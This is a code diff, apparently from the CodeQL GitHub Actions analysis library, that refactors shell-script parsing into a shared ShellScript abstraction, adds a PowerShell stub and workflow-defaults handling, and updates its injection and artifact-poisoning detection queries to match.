| - // VAR2=$(cmd) - // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) - run.getAnAssignment(var2, value2) and - containsCmdSubstitution(value2, cmd) and - containsParameterExpansion(file_write_value, var2, _, _) - ) - or - // var reaches the file write directly - // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) - containsCmdSubstitution(file_write_value, cmd) - ) + cmdReachingRunExpr(script, cmd, file_write_value) ) } + + /** + * Holds if a command output is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ + bindingset[expr] + predicate cmdReachingRunExpr(BashShellScript script, string cmd, string expr) { + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + script.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(expr, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(expr, cmd) + } } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index ae4405a185b..fb6fdf2d74b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -3,6 +3,7 @@ private import codeql.Locations private import codeql.actions.security.ControlChecks import codeql.actions.config.Config import codeql.actions.Bash +import codeql.actions.PowerShell bindingset[expr] string normalizeExpr(string expr) { diff --git a/ql/lib/codeql/actions/PowerShell.qll b/ql/lib/codeql/actions/PowerShell.qll new file mode 100644 index 00000000000..1727930c2a3 --- /dev/null +++ b/ql/lib/codeql/actions/PowerShell.qll @@ -0,0 +1,50 @@ +private import codeql.actions.Ast + +class PowerShellScript extends ShellScript { + PowerShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches("pwsh%") + ) + } + + override string getStmt(int i) { none() } + + override string getAStmt() { none() } + + override string getCommand(int i) { none() } + + override string getACommand() { none() } + + override string getFileReadCommand(int i) { none() } + + override string getAFileReadCommand() { none() } + + override predicate getAssignment(int i, string name, string data) { none() } + + override predicate getAnAssignment(string name, string data) { none() } + + override predicate getAWriteToGitHubEnv(string name, string data) { none() } + + override predicate getAWriteToGitHubOutput(string name, string data) { none() } + + override predicate getAWriteToGitHubPath(string data) { none() } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { none() } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { none() } + + override predicate fileToGitHubEnv(string path) { none() } + + override predicate fileToGitHubOutput(string path) { none() } + + override predicate fileToGitHubPath(string path) { none() } +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index eaf1ae871a9..43772a978c5 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -62,6 +62,7 @@ private newtype TAstNode = n.lookup("jobs") instanceof YamlMapping } or TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or + TDefaultsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("defaults") = n) } or TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or @@ -141,6 +142,19 @@ abstract class AstNodeImpl extends TAstNode { env.getParentNode().getAChildNode*() = this ) } + + ScalarValueImpl getInScopeDefaultValue(string name, string prop) { + exists(DefaultsImpl dft | + this.getEnclosingJob().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + or + not exists(DefaultsImpl dft | this.getEnclosingJob() = dft.getParentNode()) and + exists(DefaultsImpl dft | + this.getEnclosingWorkflow().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + } } class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { @@ -165,6 +179,61 @@ class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { string getValue() { result = value.getValue() } } +class ShellScriptImpl extends ScalarValueImpl { + ShellScriptImpl() { exists(YamlMapping run | run.lookup("run").(YamlScalar) = this.getNode()) } + + string getRawScript() { result = this.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + + RunImpl getEnclosingRun() { result.getNode().lookup("run") = this.getNode() } + + abstract string getStmt(int i); + + abstract string getAStmt(); + + abstract string getCommand(int i); + + string getACommand() { + if this.getEnclosingRun().getShell().matches("bash%") + then result = this.(BashShellScript).getACommand() + else + if this.getEnclosingRun().getShell().matches("pwsh%") + then result = this.(PowerShellScript).getACommand() + else result = "NOT IMPLEMENTED" + } + + abstract string getFileReadCommand(int i); + + abstract string getAFileReadCommand(); + + abstract predicate getAssignment(int i, string name, string data); + + abstract predicate getAnAssignment(string name, string data); + + abstract predicate getAWriteToGitHubEnv(string name, string data); + + abstract predicate getAWriteToGitHubOutput(string name, string data); + + abstract predicate getAWriteToGitHubPath(string data); + + abstract predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubPathWrite(string var); + + abstract predicate getACmdReachingGitHubPathWrite(string cmd); + + abstract predicate fileToGitHubEnv(string path); + + abstract predicate fileToGitHubOutput(string path); + + abstract predicate fileToGitHubPath(string path); +} + class ExpressionImpl extends AstNodeImpl, TExpressionNode { YamlNode key; YamlString value; @@ -493,6 +562,28 @@ class InputsImpl extends AstNodeImpl, TInputsNode { } } +class DefaultsImpl extends AstNodeImpl, TDefaultsNode { + YamlMapping n; + + DefaultsImpl() { this = TDefaultsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "DefaultsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + ScalarValueImpl getValue(string name, string prop) { + n.lookup(name).(YamlMapping).lookup(prop) = result.getNode() + } +} + class InputImpl extends AstNodeImpl, TInputNode { YamlValue n; @@ -1314,20 +1405,18 @@ class ExternalJobImpl extends JobImpl, UsesImpl { class RunImpl extends StepImpl { YamlScalar script; + ScalarValueImpl scriptScalar; - RunImpl() { this.getNode().lookup("run") = script } - - string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } - - ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } - - ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } + RunImpl() { + this.getNode().lookup("run") = script and + scriptScalar = TScalarValueNode(script) + } override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" } - /** Gets the working directory for this `runs` mapping. */ + /** Gets the working directory for this `run` mapping. */ string getWorkingDirectory() { if exists(n.lookup("working-directory").(YamlString).getValue()) then @@ -1339,268 +1428,19 @@ class RunImpl extends StepImpl { else result = "GITHUB_WORKSPACE/" } - private string lineProducer(int i) { - result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + /** Gets the shell for this `run` mapping. */ + string getShell() { + if exists(n.lookup("shell").(YamlString).getValue()) + then result = n.lookup("shell").(YamlString).getValue() + else + if exists(this.getInScopeDefaultValue("run", "shell")) + then result = this.getInScopeDefaultValue("run", "shell").getValue() + else result = "bash" } - private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { - exists(string line | line = this.lineProducer(k) | - exists(int i, int j | - cmdSubs = - // $() cmd substitution - line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) - .regexpReplaceAll("^\\$\\(", "") - .regexpReplaceAll("\\)$", "") and - id = "cmdsubs:" + k + ":" + i + ":" + j - ) - or - exists(int i, int j | - // `...` cmd substitution - cmdSubs = - line.regexpFind("\\`[^\\`]+\\`", i, j) - .regexpReplaceAll("^\\`", "") - .regexpReplaceAll("\\`$", "") and - id = "cmd:" + k + ":" + i + ":" + j - ) - ) - } + ShellScriptImpl getScript() { result = scriptScalar } - private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { - old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and - this.cmdSubstitutionReplacement(old, new, _) - } - - private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.lineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(target, replacement) - ) - } - - private string cmdSubstitutedLineProducer(int i) { - // script lines where any command substitution has been replaced with a unique placeholder - result = - max(int round, string new | - this.doReplaceCmdSubstitutions(i, round, _, new) - | - new order by round - ) - or - this.cmdSubstitutionReplacement(result, _, i) - } - - private predicate quotedStringReplacement(string quotedStr, string id) { - exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | - exists(int i, int j | - // double quoted string - quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and - id = - "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + - quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") - ) - or - exists(int i, int j | - // single quoted string - quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and - id = - "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + - quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") - ) - ) - } - - private predicate rankedQuotedStringReplacements(int i, string old, string new) { - old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and - this.quotedStringReplacement(old, new) - } - - private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.cmdSubstitutedLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doReplaceQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(target, replacement) - ) - } - - private string quotedStringLineProducer(int i) { - result = - max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) - } - - private string stmtProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and - // when splitting the line with a separator that is not present, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::splitSeparator()) > -1 - } - - private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.stmtProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - private string restoredStmtQuotedStringLineProducer(int i) { - result = - max(int round, string new | - this.doStmtRestoreQuotedStrings(i, round, _, new) - | - new order by round - ) - } - - private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.restoredStmtQuotedStringLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - string getStmt(int i) { - result = - max(int round, string new | - this.doStmtRestoreCmdSubstitutions(i, round, _, new) - | - new order by round - ) - } - - string getAStmt() { result = this.getStmt(_) } - - private string cmdProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and - // when splitting the line with a separator that is not present, the result is the original line which may contain other separators - // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::separator()) > -1 - } - - private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { - round = 0 and - old = this.cmdProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and - this.rankedQuotedStringReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - private string restoredCmdQuotedStringLineProducer(int i) { - result = - max(int round, string new | - this.doCmdRestoreQuotedStrings(i, round, _, new) - | - new order by round - ) - } - - private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { - round = 0 and - old = this.restoredCmdQuotedStringLineProducer(line) and - new = old - or - round > 0 and - exists(string middle, string target, string replacement | - this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and - this.rankedCmdSubstitutionReplacements(round, target, replacement) and - new = middle.replaceAll(replacement, target) - ) - } - - string getCmd(int i) { - result = - max(int round, string new | - this.doCmdRestoreCmdSubstitutions(i, round, _, new) - | - new order by round - ) - } - - string getACmd() { result = this.getCmd(_) } - - string getCommand(int i) { - result = this.getCmd(i) and - // exclude variable declarations - not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and - // exclude the following keywords - not result = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", - "esac", "{", "}" - ] - } - - string getACommand() { result = this.getCommand(_) } - - predicate getAssignment(int i, string name, string value) { - exists(string stmt | - stmt = this.getStmt(i) and - name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and - value = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) - ) - } - - predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } - - predicate getAWriteToGitHubEnv(string name, string value) { - exists(string raw | - Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and - Bash::extractVariableAndValue(raw, name, value) - ) - } - - predicate getAWriteToGitHubOutput(string name, string value) { - exists(string raw | - Bash::extractFileWrite(this.getScript(), "GITHUB_OUTPUT", raw) and - Bash::extractVariableAndValue(raw, name, value) - ) - } - - predicate getAWriteToGitHubPath(string value) { - Bash::extractFileWrite(this.getScript(), "GITHUB_PATH", value) - } - - predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { - Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) - } - - predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { - Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) - } - - predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { - Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) - } - - predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { - Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) - } + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } } /** diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8a6e52309fb..5ceab79820b 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -282,7 +282,7 @@ private class RunTree extends StandardPreOrderTree instanceof Run { ( child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr() or - child = super.getScriptScalar() + child = super.getScript() ) and l = child.getLocation() | diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index f1fb2073ed0..b30fd5495ed 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -86,7 +86,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { exists(Uses uses | checkout = uses and uses.getCallee() = "actions/checkout" and - exists(uses.getArgument("ref")) + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or checkout instanceof GitMutableRefCheckout @@ -97,9 +98,9 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { or checkout instanceof GhSHACheckout ) and - this.asExpr() = run.getScriptScalar() and + this.asExpr() = run.getScript() and checkout.getAFollowingStep() = run and - run.getACommand() = cmd and + run.getScript().getACommand() = cmd and cmd.indexOf("git") = 0 and untrustedGitCommandsDataModel(cmd_regex, flag) and cmd.regexpMatch(cmd_regex) @@ -127,8 +128,8 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { // PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH}) // BODY=$(jq -r '.issue.body' "$GITHUB_EVENT_PATH" | sed -n '3p') GitHubEventPathSource() { - this.asExpr() = run.getScriptScalar() and - run.getACommand() = cmd and + this.asExpr() = run.getScript() and + run.getScript().getACommand() = cmd and cmd.matches("jq%") and cmd.matches("%GITHUB_EVENT_PATH%") and exists(string regexp | @@ -207,10 +208,11 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - exists(Uses u | - this.asExpr() = u and - u.getCallee() = "actions/checkout" and - exists(u.getArgument("ref")) + exists(Uses uses | + this.asExpr() = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) and + not uses.getArgument("ref").matches("%base%") ) or this.asExpr() instanceof GitMutableRefCheckout diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 787a5f72084..0f7e906685b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,7 +23,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(Run run, string var, string field | run.getInScopeEnvVarExpr(var) = pred.asExpr() and succ.asExpr() = run and - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and + run.getScript().getAnEnvReachingGitHubOutputWrite(var, field) and c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } @@ -35,8 +35,8 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: run.getInScopeEnvVarExpr(var) = pred.asExpr() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and - Bash::envReachingGitHubFileWrite(run, var, "GITHUB_ENV", field) and - c = any(DataFlow::FieldContent ct | ct.getName() = field) //and + run.getScript().getAnEnvReachingGitHubEnvWrite(var, field) and + c = any(DataFlow::FieldContent ct | ct.getName() = field) ) } @@ -55,12 +55,12 @@ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Dat or exists(FileSource source | source.asExpr().(Step).getAFollowingStep() = run and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getAFileReadCommand() = cmd ) ) and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and + run.getScript().getACmdReachingGitHubOutputWrite(cmd, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and + pred.asExpr() = run.getScript() and succ.asExpr() = run ) } @@ -80,12 +80,12 @@ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFl or exists(FileSource source | source.asExpr().(Step).getAFollowingStep() = run and - Bash::outputsPartialFileContent(run, cmd) + run.getScript().getAFileReadCommand() = cmd ) ) and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and + run.getScript().getACmdReachingGitHubEnvWrite(cmd, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and + pred.asExpr() = run.getScript() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) diff --git a/ql/lib/codeql/actions/dataflow/TaintSteps.qll b/ql/lib/codeql/actions/dataflow/TaintSteps.qll index de64a0dd6f4..e9d5a44c929 100644 --- a/ql/lib/codeql/actions/dataflow/TaintSteps.qll +++ b/ql/lib/codeql/actions/dataflow/TaintSteps.qll @@ -22,14 +22,14 @@ class AdditionalTaintStep extends Unit { } /** - * A download artifact step followed by a step that may use downloaded artifacts. + * A file source step followed by a Run step may read the file. */ predicate fileDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(FileSource source, Run run | pred = source and source.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 18ff398ebab..a0309437292 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -17,11 +17,11 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { bindingset[var] predicate envToArgInjSink(string var, Run run, string command) { exists(string argument, string cmd, string regexp, int command_group, int argument_group | - run.getACommand() = cmd and + run.getScript().getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and command = cmd.regexpCapture(regexp, command_group) and argument = cmd.regexpCapture(regexp, argument_group) and - Bash::envReachingRunExpr(run, var, argument) and + Bash::envReachingRunExpr(run.getScript(), var, argument) and exists(run.getInScopeEnvVarExpr(var)) ) } @@ -40,15 +40,15 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ArgumentInjectionFromEnvVarSink() { exists(Run run, string var | envToArgInjSink(var, run, command) and - run.getScriptScalar() = this.asExpr() and + run.getScript() = this.asExpr() and exists(run.getInScopeEnvVarExpr(var)) ) or exists( Run run, string cmd, string argument, string regexp, int argument_group, int command_group | - run.getACommand() = cmd and - run.getScriptScalar() = this.asExpr() and + run.getScript().getACommand() = cmd and + run.getScript() = this.asExpr() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and command = cmd.regexpCapture(regexp, command_group) and @@ -75,8 +75,8 @@ class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { int command_group | run = source.getEnclosingRun() and - this.asExpr() = run.getScriptScalar() and - cmd = run.getACommand() and + this.asExpr() = run.getScript() and + cmd = run.getScript().getACommand() and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and command = cmd.regexpCapture(regexp, command_group) @@ -106,8 +106,8 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { exists( Run run, string argument, string cmd, string regexp, int command_group, int argument_group | - run.getScriptScalar() = source.asExpr() and - run.getACommand() = cmd and + run.getScript() = source.asExpr() and + run.getScript().getACommand() = cmd and argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = cmd.regexpCapture(regexp, argument_group) and argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") @@ -119,7 +119,7 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var | run.getInScopeEnvVarExpr(var) = pred.asExpr() and - succ.asExpr() = run.getScriptScalar() and + succ.asExpr() = run.getScript() and envToArgInjSink(var, run, _) ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 31a9edd03b3..d06b125ca32 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -155,15 +155,21 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use } override string getPath() { - if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + if + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else - if this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } @@ -172,31 +178,37 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - this.getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and - this.getACommand().matches("%github.event.workflow_run.id%") and + this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and + this.getScript().getACommand().matches("%github.event.workflow_run.id%") and ( - this.getACommand().regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(this.getACommand() + normalizePath(trimQuotes(this.getScript() + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else if - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) or - this.getACommand().regexpMatch(unzipRegexp()) + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" else none() } @@ -213,24 +225,30 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { // gh api $url > "$name.zip" // unzip -d "$name" "$name.zip" // done - this.getACommand().matches("%github.event.workflow_run.artifacts_url%") and + this.getScript().getACommand().matches("%github.event.workflow_run.artifacts_url%") and ( - this.getACommand().regexpMatch(unzipRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp()) or + this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) ) } override string getPath() { if - this.getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or - this.getAFollowingStep().(Run).getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) + this.getScript().getACommand().regexpMatch(unzipRegexp() + unzipDirArgRegexp()) or + this.getAFollowingStep() + .(Run) + .getScript() + .getACommand() + .regexpMatch(unzipRegexp() + unzipDirArgRegexp()) then result = - normalizePath(trimQuotes(this.getACommand() + normalizePath(trimQuotes(this.getScript() + .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) + .getScript() .getACommand() .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) else result = "GITHUB_WORKSPACE/" @@ -246,7 +264,7 @@ class ArtifactPoisoningSink extends DataFlow::Node { // excluding artifacts downloaded to /tmp not download.getPath().regexpMatch("^/tmp.*") and ( - poisonable.(Run).getScriptScalar() = this.asExpr() and + poisonable.(Run).getScript() = this.asExpr() and ( // Check if the poisonable step is a local script execution step // and the path of the command or script matches the path of the downloaded artifact @@ -280,7 +298,7 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { pred instanceof ArtifactSource and pred.asExpr().(Step).getAFollowingStep() = step and ( - succ.asExpr() = step.(Run).getScriptScalar() or + succ.asExpr() = step.(Run).getScript() or succ.asExpr() = step.(UsesStep) ) ) @@ -288,8 +306,8 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof ArtifactSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index ca72fe00d16..fac498f72da 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -31,8 +31,8 @@ private module CodeInjectionConfig implements DataFlow::ConfigSig { exists(Run run | pred instanceof FileSource and pred.asExpr().(Step).getAFollowingStep() = run and - succ.asExpr() = run.getScriptScalar() and - Bash::outputsPartialFileContent(run, run.getACommand()) + succ.asExpr() = run.getScript() and + exists(run.getScript().getAFileReadCommand()) ) } } diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll 